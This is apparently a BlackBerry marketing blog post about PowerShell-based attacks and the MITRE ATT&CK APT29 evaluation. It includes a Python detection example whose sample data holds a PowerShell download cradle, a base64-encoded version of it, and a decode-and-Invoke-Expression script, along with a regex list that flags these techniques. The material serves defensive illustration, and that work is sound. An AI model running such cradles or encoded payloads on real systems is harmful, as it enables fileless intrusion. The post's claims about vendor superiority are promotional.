MITRE ATT&CK Framework: Taking the Power Out of PowerShell
The MITRE ATT&CK® framework is a global knowledge base of threat actors’ tactics and techniques drawn from real-world cyber-attacks. As such, it highlights potential attack vectors and uniformly describes the “how” and “why” of a threat actor’s actions. MITRE provides a common knowledge base and verbiage for describing attacks, ultimately benefiting end users by organizing complex information into an understandable and actionable format.
BlackBerry recently participated in the MITRE ATT&CK APT29 evaluation where BlackBerry® Protect, BlackBerry® Optics, and BlackBerry® Guard were tested against the attack strategies of APT29, a threat group reportedly tied to the Russian government. BlackBerry excelled throughout these tests (see the results). One of the areas where BlackBerry performed exceptionally well was in regard to the visibility provided into one of the attacker’s favorite tools – PowerShell.
In the past, PowerShell-based attacks were reserved for the realm of the truly hardcore, like APTs and advanced hacking groups. As antivirus gets more and more effective, threat actors of all shapes and sizes are looking for the next path of least resistance, and, as it turns out, that path likely involves lots of PowerShell. APTs paved the way for these types of attacks by demonstrating success, and now everyone from script kiddies on up is following suit.
Why APTs Leverage PowerShell
PowerShell is a highly effective attack vector for a few reasons: it can be found on every modern Windows OS, it’s an extremely powerful and capable tool, and it is well documented, which benefits both attackers and defenders alike.
Because of the availability and documentation, it should be an easy win for endpoint vendors to instrument PowerShell in order to alert and stop a malicious actor when they try to do something weird. But there is a catch that trips up many solutions: there are several entry points to PowerShell, and you have to understand each one to effectively address it as an attack vector.
It’s not sufficient, for example, to rely on command-line arguments alone. You have to be able to see what’s going on inside the file PowerShell is attempting to execute, the content it is trying to extract from that file, and the modules it is trying to run.
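To make the visibility point concrete, here is an added example in Python (not BlackBerry’s code or the product’s logic): it classifies constructed PowerShell telemetry three ways, from the raw command line, from the command line after decoding any -EncodedCommand argument, and from the script content that Windows script block logging (event ID 4104) records, to show which entry points the command line alone misses. The pattern list, the sample events, and the file path are constructed for illustration only.

```python
import base64
import re

# Content patterns a defender would flag in executed PowerShell. Illustrative
# and constructed for this example, not a production rule set.
PATTERNS = {
    "download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "decode": re.compile(r"FromBase64String", re.I),
    "invoke": re.compile(r"Invoke-Expression", re.I),
}

def encode_command(script):
    """Build the -EncodedCommand form (base64 of UTF-16LE) to construct samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

def decode_encoded_command(cmdline):
    """Recover the script hidden behind -EncodedCommand/-enc/-ec, or None."""
    m = re.search(r"-(?:EncodedCommand|enc|ec)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None

def classify(text):
    """Sorted names of the patterns that match the given text."""
    return sorted(name for name, rx in PATTERNS.items() if rx.search(text))

def inspect_event(event):
    """Compare what the raw command line reveals, what it reveals once any encoded
    command is decoded, and what the executed script content (event ID 4104) reveals."""
    decoded = decode_encoded_command(event["cmdline"]) or ""
    return {
        "cmdline_only": classify(event["cmdline"]),
        "cmdline_decoded": classify(event["cmdline"] + decoded),
        "script_block": classify(event.get("script_block") or decoded),
    }

# Constructed sample telemetry: three entry points for the same kind of activity.
DOWNLOAD = "(New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
EVENTS = [
    # 1. Script passed in clear text on the command line.
    {"cmdline": f'powershell.exe -NoProfile -Command "{DOWNLOAD}"', "script_block": DOWNLOAD},
    # 2. Same script passed base64-encoded; the raw command line shows nothing useful.
    {"cmdline": "powershell.exe -NoProfile -EncodedCommand " + encode_command(DOWNLOAD),
     "script_block": DOWNLOAD},
    # 3. Script file on disk (constructed path); only executed content shows the decode-and-run step.
    {"cmdline": r"powershell.exe -File C:\Users\Public\update.ps1",
     "script_block": "$p = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($blob))\n"
                     "Invoke-Expression $p"},
]
```

Running `inspect_event` over `EVENTS` shows the command line alone flags only the first case, while the script-block view flags all three.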
Figure 1: Full telemetry for PowerShell enumerating system information.
Taking the Power Out of PowerShell
What we have developed in BlackBerry® Optics is the ability to inspect PowerShell regardless of how it is invoked. At the end of the day, this allows users to query for different types of activity, see it retroactively, and receive alerts in real time to take response actions. BlackBerry Optics detects PowerShell trying to download a file. And - boom! - kills it. Trying to decode an encrypted payload? Boom! Kills it.
An interesting factor highlighted in Josh Zelonis’s analysis of the MITRE APT29 ATT&CK evaluation is that this is apparently difficult for nearly every endpoint vendor to implement in practice. He dubs these issues “Powerfails.” Fileless attacks need to be prevented, but many of the leading EDR/EPP solutions don’t have adequate visibility in real-world situations, as demonstrated empirically by MITRE and Mr. Zelonis’s analysis.
Figure 2: A chart representing Josh Zelonis's 'Powerfails' analysis. (NOTE: Cylance was acquired by BlackBerry in 2019.)
Takeaways
We will likely see many threat actors move away from relying on pre-built frameworks, instead invoking PowerShell manually or using other living-off-the-land techniques that rely on PowerShell. You may think you’re safe, but without proper visibility you aren’t. You might be looking at how PowerShell is being spawned, but not actually inside it to see what it is doing - which is where the true threat lies.
Most vendors are good at specific usages of PowerShell like you may find in PowerView or Empire, since detection of these techniques functions basically like an antivirus signature. BlackBerry Optics is one of the only solutions that provides thorough visibility regardless of entry point or framework in use.
BlackBerry performed extraordinarily well in terms of number of detections, far surpassing traditional EDR players. The MITRE ATT&CK APT29 evaluation clearly demonstrated that our solutions protect systems from attack strategies used by world-class threat actors. Our mapping to threat techniques and tactics is robust and our balanced approach between automation and manual interaction is effective.
For full results of the evaluation, please visit the MITRE page. MITRE does not offer interpretation or analysis of results, but we are happy to discuss our performance and answer any questions. Please contact us with your inquiries.